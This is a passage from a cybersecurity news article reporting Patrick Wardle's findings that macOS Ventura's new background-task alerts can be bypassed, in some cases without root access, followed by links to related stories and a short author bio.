More concerning are two other bypass methods that don’t necessitate root access, exploiting flaws in how the alerting system communicates with the operating system’s core (the kernel) and leveraging the capability to put processes to sleep.

The security researcher’s findings reflect broader concerns about the efficacy of macOS Ventura’s security enhancements. Wardle emphasized that the rushed implementation of monitoring tools can give users a false sense of security, potentially overlooking critical security risks.

Apple has not yet responded to requests for comment regarding Wardle’s findings. Despite the vulnerabilities exposed, Wardle remains hopeful that these revelations will encourage Apple to refine its security measures further, ensuring a safer environment for Mac users. 

**More Findings from Patrick Wardle**

1.  Hackers Targeting Apple’s M1 Chip with Mac Malware
2.  Apple approved malware camouflaged as Adobe Flash Player
3.  How easily macOS user warnings can be bypassed by malware
4.  LockBit Ransomware Expands Attack Spectrum to Mac Devices
5.  Cryptocurrency users on Discord & Slack hit by MacOS malware
6.  Researcher creates app to notify users of evil maid attack on MacBook

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Tag

#apple